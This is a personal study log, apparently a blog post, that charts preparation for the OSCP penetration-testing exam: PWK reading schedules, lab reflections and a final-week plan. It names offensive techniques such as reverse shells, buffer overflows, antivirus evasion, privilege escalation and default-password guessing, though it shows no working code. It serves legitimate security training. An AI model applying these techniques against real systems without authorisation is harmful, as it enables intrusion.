OSCP Exam Cram Log – Aug/Sept/Oct 2018

I’ll be using this as a means of tracking my personal study progress toward the OSCP exam keeping a daily log.  Scheduled exam date: 11/09/2018

PART ONE: Review of OSCP Videos and PWK Readings

With a total of 149 videos and 375 pages worth of readings to review I’ll aim to get through around 15 pages daily (and corresponding videos, exercises) to finish this first stage within a month.

Day 1 (8/30/2018)
Section 0: Penetration Testing: What You Should Know
PWK Readings: 13-33
PWK Videos: 0-1
Additional Review: Open Source Security Testing Methodology Manual, OSCP Certification Exam Guide, PWK Reporting

Day 2 (8/31/2018)
Section 1: Getting Comfortable with Kali Linux
PWK Readings: 34-49
PWK Videos: 3-10
Additional Review: Bash & Python scripting (for pen-testing) research/practice

Day 3 (9/01/2018)
Section 2.1: Netcat / Section 2.2: Ncat
PWK Readings: 50-64
PWK Videos: 11-18
Additional Review: nc/ncat/sbd options.  Ncat Cheat Sheet (also includes other pentestmonkey reverse shell examples)

Day 4 (9/02/2018)
Section 2.3: Wireshark / Section 2.4: Tcpdump / 3.1.1: Passive Information Gathering: Google
PWK Readings: 65-82
PWK Videos: 19-21
Additional Review: Tcpdump & Wireshark Cheat Sheets, Tcpdump Primer

Day 5 (9/03/2018)
Section 3.1.2: Google Hacking / 3.2: Email Harvesting / 3.3 Additional Resources / 3.4: Recon-ng
PWK Readings: 83-95
PWK Videos: 22-23
Additional Review: Google Hacking Database (GHDB), Recon-ng module exploration

Day 6 (9/04/2018)
Section 4.1: DNS Enumeration / 4.2: Port Scanning
PWK Readings: 96-119
PWK Videos: 24-38
Additional Review: Subdomain Enumeration, DNSRecon, DNSenum options, Experimentation with Nmap Grep-able output, NMAP Cheat Sheet, Researching popular NSE scripts for Nmap.

Day 7 (9/05/2018)
Section 4.3: SMB Enumeration / 4.4: SMTP Enumeration / 4.5 SNMP Enumeration
PWK Readings: 120-133
PWK Videos: 39-48
Additional Review: Modern (3.X) SMB Vulns, SMTP User Enumeration Practice with GoldenEye Vulnhub VM, Reviewed section of the Necromancer VM requiring snmpwalk and community strings.

Day 8 (9/06/2018)
Section 5: Vulnerability Scanning / Section 6: Buffer Overflows
PWK Readings: 134-151
PWK Videos: 49-54
Additional Review: BOF examples, brainpan.exe from Brainpan VM

Day 9 (9/07/2018)
Section 7: Win32 Buffer Overflow Exploitation
PWK Readings: 152-172
PWK Videos: 55-63
Additional Review: Vulnserver

Day 10 (9/08/2018)
Section 8: Win32 Buffer Overflow Exploitation
PWK Readings: 173-184
PWK Videos: 64-69
Additional Review: TODO – More BOF Practice (exercises from books, vulnserver.exe, Protostar/Fusion/Nebula, Corelan Writeup, Fortress:Jet on HacktheBox, Chatterbox & other HTB machines.  Ideally should prep skeleton code for fuzzing, and each stage of BOF exploitation along with some ready-made notes or commented out lines for different archs, different encoding schemes, different payload types, common bad characters not to use, etc.

Day 11 (9/09/2018)
Section 9: Working with Exploits
PWK Readings: 185-194
PWK Videos: 70-75
Additional Review: HTB lab practice.

Day 12 (9/10/2018)
Section 10: File Transfers
PWK Readings: 195-205
PWK Videos: 76-80
Additional Review: Research on obfuscation techniques for transfer methods.

Day 13 (9/11/2018)
Section 11: Privilege Escalation
PWK Readings: 206-213
PWK Videos: 81-85
Additional Review: Linux Priv-esc Cheat Sheet, Windows Priv-esc Cheat Sheet

Day 14 (9/12/2018)
Section 12: Client Side Attacks
PWK Readings: 214-227
PWK Videos: 86-88
Additional Review: Msfvenom Cheat Sheet

Day 15 (9/13/2018)
Section 13.1: Essential Firefox Add-ons / Section 13.2: Cross Site Scripting / 13.3: File Inclusion Vulnerabilities
PWK Readings: 228-244
PWK Videos: 89-90
Additional Review: OWASP – Testing for Input Validation, Another Example of Log Poisoing for LFI

Day 16 (9/14/2018)
Section 13.4: MySQL SQL Injection / Section 13.5: Web Application Proxies
PWK Readings: 245-259
PWK Videos: 91-95
Additional Review: SQLi Cheat Sheet, Testing for SQL Injection

Day 17 (9/15/2018)
Section 13.6: Automated SQL Injection Tools / 14.1: Preparing for Brute Force / 14.2: Online Password Attacks
PWK Readings: 260-279
PWK Videos: 96-106
Additional Review: Mimikatz, More from BHIS

Day 17 (9/16/2018)
Section 14.3: Password Hash Attacks / 15.1: Port Forwarding/Redirection / 15.2 SSH Tunneling
PWK Readings: 280-295
PWK Videos: 107-113
Additional Review:

Day 18 (9/16/2018)
Section 14.3: Password Hash Attacks / 15.1: Port Forwarding/Redirection / 15.2 SSH Tunneling
PWK Readings: 280-295
PWK Videos: 107-113
Additional Review:

Day 19 (9/17/2018)
Section 15.3: Proxychains / 15.4: HTTP Tunneling / 15.5: Traffic Encapsulation / 16.1: MSF UI / 16.2: Setting UP MSF / 16.3: Exploring MSF / 16.4: Auxiliary Modules
PWK Readings: 296-313
PWK Videos: 114-120
Additional Review: Additional research on proxychains usage, popular usages of MSF in pentesting.

Day 20 (9/18/2018)
Section 16.5: Exploit Modules / 16.6: Metasploit Payloads
PWK Readings: 314-326
PWK Videos: 121-127
Additional Review: Exploring which shells (single/multi-stage, type, etc.) might be used for different reasons.

Day 21 (9/19/2018)
Section 16.7: Building Your Own MSF Module / 16.8: Post Exploitation with Metasploit / 17: Bypassing Antivirus Software
PWK Readings: 327-340
PWK Videos: 128-132
Additional Review: Exploration of current AV-evasion techniques.

Day 22 (9/20/2018)
Section 18: Assembling the Pieces: Penetration Test Breakdown (18.1-18.6.3) – Scenario Description, Information Gathering, Vuln Identification & Prioritization, R&D, Exploitation, and Post-Exploitation Phases
PWK Readings: 341-357
PWK Videos: 133-141
Additional Review: Researching other publicly available pen-test reports, play-by-plays, templates.

Day 23 (9/21/2018)
Section 18.6.4: Port Tunneling / 18.6.5: SSH Tunneling with HTTP Encapsulation / 18.6.6: Looking for High Value Targets / 18.6.7: Domain Privilege Escalation / 18.6.8: Going for the Kill
PWK Readings: 357-375
PWK Videos: 142-148
Additional Review:

PART TWO: Begin Lab Time (30 days)

Day 1 (9/22/2018)
Difficulties: Efficient NMAP enumeration, linux privesc enumeration, making assumptions (!), efficiency.
Remedies or things for review: Check on everything.  Even security products may have a vulnerability to exploit.  Priv-esc scripts can be helpful to enumerate possible weaknesses, but much of these steps should be repeated until committed better to memory.  Do high-level research on available services first and try to approximate which services would be easiest to try to exploit.  Dirbuster and more in-depth scans should be initiated immediately while you work on other things to save time.  “nmap -sTU –top-ports ###” for quick initial network segment scan.

Day 2 (9/23/2018)
Difficulties: Getting Stuck
Remedies or things for review: Always try stupid things first.  Input restrictions are not always intelligent so just try variety of different things, don’t over-complicate. Passwords are sometimes that easy (admin:admin, username:username, username:emanresu, etc.) Linux Privesc Vid | Windows Privesc Vid

Day 3 (9/24/2018)
Difficulties: Enumeration, Unstable shells
Remedies or things for review: When you think you’ve looked at everything, assume you haven’t and look again with fresh eyes.  In case of shells dropping try a variety of payloads (generic/arch-specific, staged/non, etc.), if that doesn’t work maybe something is killing your process.  If you’re running a meterpreter session maybe you need to migrate to a safe place, maybe you just need to kill the thing that is about to kill you.  🙂

Day 4 (9/25/2018)
Enumerate enumerate enumerate.   Even though this advice is sometimes as annoying as someone saying to “try harder”, it’s very true.  If you’re stuck or keep looking at a service using the same tool look into other ways to enumerate, or just look up more information on how the service itself works.  Different tools have different strengths and sometimes they miss things that you just won’t find without getting a second opinion.

Day 7 (9/28/2018)
Feeling frustrated is part of the process.  I’ve been pretty lucky in the labs to get elevated privileges right off the bat, but am having a much harder time elevating low-privilege users on Windows vs Linux systems.  This resource  and others are helping considerably.  I’m making good progress in terms of total compromised lab machines but I’m also realizing I need to get a lot more practice in to become efficient and quick about about the entire process.

Day 17 (10/08/2018)
Making pretty good progress through the lab machines so far.  I’ve been trying to balance out my time a little between the labs and also watching instructional videos on exploiting the specific services/etc. that I’m running across in labs to better understand and look for similar things in the future.  Privesc especially for Windows systems is something I’m struggling with a lot but am slowly getting better.  Watching Ippsec HacktheBox/Vulnhub walkthroughs have been very helpful in terms of polishing enumeration skills, running more effective initial scans, and just general service exposure.  More than I anticipated managing emotions/frustration has been a big hurdle throughout the OSCP process.  Learning to take a break when you’re not getting anywhere is very important.  Coming back with fresh eyes and a level head will do you far more good than trying to hammer down the same path for extended periods.  Typically the most frustrating boxes are the ones that teach you the most, are the most memorable, and are the most satisfying when you finally root.  Something to always keep in mind.

PART Three: Final Prep for Exam

7 days until exam (11/02/2018)

It’s been a long time since my last update and I’ve finished up my 30 days of lab time as of Oct 21.  I was keeping a good pace generally doing at least 1 lab machine a day, sometimes 2-3 depending on the difficulty.  In the case of some of the more notoriously difficult ones…they ended up taking a couple days each.  I have mixed feelings at this point because while with very few exceptions I was eventually able to get through each box, and learned valuable lessons from them, each did take some time and the fear is if I see something with similar “newness” on the exam it could mean I’d be pretty seriously crunched for time.  Since I can’t anticipate whether the boxes chosen will align with my specific experience or not, the best I can do is focus on doing what I know now as quickly and efficiently as possible to allot more time for the “unknown”.  Part of that is having information ready at hand and not having to dig for it.

I was initially going to compile a list of resources I use frequently into sort of a wiki/cheat sheet, but finding that others have already done a lot of this hard work for me I will just go ahead and plug a list here:

Passing OSCP – Long list of common enumeration methods, shells, frequently used payloads, file transfer methods, PrivEsc resources + script checkers, etc.

And here are some other resources that I find I use constantly:

Upgrading simple shells to fully interactive TTYs

Transferring Files from Linux to Windows (post-exploitation) – Transferring files via SMB isn’t covered in the PWK materials but it’s an extremely easy way to push files back and forth for Windows machines.

Pspy – This might be a new favorite tool for the labs + CTF boxes in general.  Have a shell but don’t have access to see what cronjobs or automated commands are running as root? Grab them as they run in the process list.

For PrivEsc I constantly refer back to the g0tmi1k (Linux) + FuzzySecurity (Windows) which are in the Passing OSCP guide.

One other thing I did do in relation to the BOF exercises to prep was in going through every step of the process I copied my python code to a new separate numbered file.  That way I can come back to this skeleton code on the exam if I need to and just modify the existing code I have to work with the machine.

One final recommendation would be to join the folks at NetSecFocus (Mattermost).  They have an OSCP-specific channel and tons of helpful people on if you need help on something, want recommendations for resources on learning a new topic, etc.

How am I spending this last week to prepare now that OSCP labs are finished?

  1. Planning sleep, food, and caffeine considerations (no joke).  Making sure to have a backup connection + spare OSCP VM setup (on planned machine and another computer just in case).
  2. Creating enumeration scripts that I can fire off and background for other machines while I work on the active one so I’m never sitting around waiting for something like dirbuster to finish or anything else that would be potentially time consuming.
  3. Hack the Box machines.  I recently bought a VIP membership which has been well worth it.  In addition to current machines it also gives access to a pool of retired machines a lot of which I’ve been going through now.  The “easier” machines there I would maybe more closely compare to some of the more common OSCP machines in terms of difficulty.  The added benefit of that is watching the associated Ippsec videos once complete to get more understanding + alternative methods for the boxes.
  4. Doing some mock exam reports with HTB machines to get used to the documentation process.
  5. More BOF examples.  Vulnserver, Brainpan I will probably repeat again for practice.
  6. Don’t panic.